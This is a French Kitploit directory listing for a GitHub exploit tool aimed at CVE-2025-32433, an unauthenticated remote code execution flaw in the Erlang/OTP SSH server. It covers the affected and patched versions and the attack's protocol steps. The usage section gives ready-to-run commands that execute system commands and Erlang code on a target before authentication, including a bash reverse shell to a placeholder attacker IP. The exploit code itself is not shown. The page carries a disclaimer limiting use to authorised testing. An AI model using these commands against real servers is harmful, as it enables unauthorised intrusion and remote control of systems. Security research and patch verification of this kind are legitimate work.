Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32433-Exploit-edited — Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility | Kitploit
Outils/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingRemote Access Tool
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 2 moisPas encore vérifié

Exploit CVE-2025-32433 (Compatible Windows)

Exécution de code à distance non authentifiée SSH Erlang/OTP

Description

Ce dépôt contient un exploit pour CVE-2025-32433, une vulnérabilité critique d'exécution de code à distance non authentifiée dans le serveur SSH Erlang/OTP.

Caractéristiques principales :

  • ✅ Exploit RCE avant authentification
  • ✅ Correction pour la compatibilité d'encodage GBK sur Windows
  • ✅ Fonctionne sur les versions Erlang/OTP ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

Détails de la vulnérabilité

CVE ID : CVE-2025-32433
Sévérité : Critique
Impact : Exécution de code à distance non authentifiée

La vulnérabilité permet à des attaquants d'exécuter des commandes système arbitraires sur des serveurs SSH Erlang/OTP sans authentification en envoyant des messages de protocole SSH spécialement conçus.

Versions affectées

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 et versions antérieures (probablement)

Utilisation

root@kitploit:~
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

Arguments

root@kitploit:~
-t, --target    Adresse IP cible (par défaut : 127.0.0.1)
-p, --port      Port cible (par défaut : 2222)
-c, --command   Commande système à exécuter
-e, --erlang    Code Erlang brut à exécuter

Correction d'encodage Windows

Cette version corrige le problème d'encodage présent dans l'exploit original :

Problème : L'exploit original utilisait le caractère de coche Unicode (✓, U+2713) qui provoque des erreurs d'encodage GBK sur Windows :

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

Solution : Remplacé le caractère Unicode par le caractère ASCII standard + pour la compatibilité multiplateforme.

Détails techniques

L'exploit fonctionne en :

  1. Établir la connexion SSH et l'échange de bannière
  2. Envoyer le paquet SSH_MSG_KEXINIT
  3. Ouvrir un canal SSH avec SSH_MSG_CHANNEL_OPEN
  4. Envoyer SSH_MSG_CHANNEL_REQUEST avec une commande exec malveillante avant l'authentification
  5. Exécuter du code Erlang arbitraire via os:cmd()

Références

  • Avis de sécurité GitHub
  • Correctif de commit Erlang/OTP
  • RFC 4254 - Protocole de connexion SSH
  • ProDefense CVE-2025-32433

Versions corrigées

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

Avertissement

Cet exploit est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. L'accès non autorisé aux systèmes informatiques est illégal. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.

Licence

Licence MIT

Auteur

Modifié pour la compatibilité Windows par chuzouX

Télécharger l’outil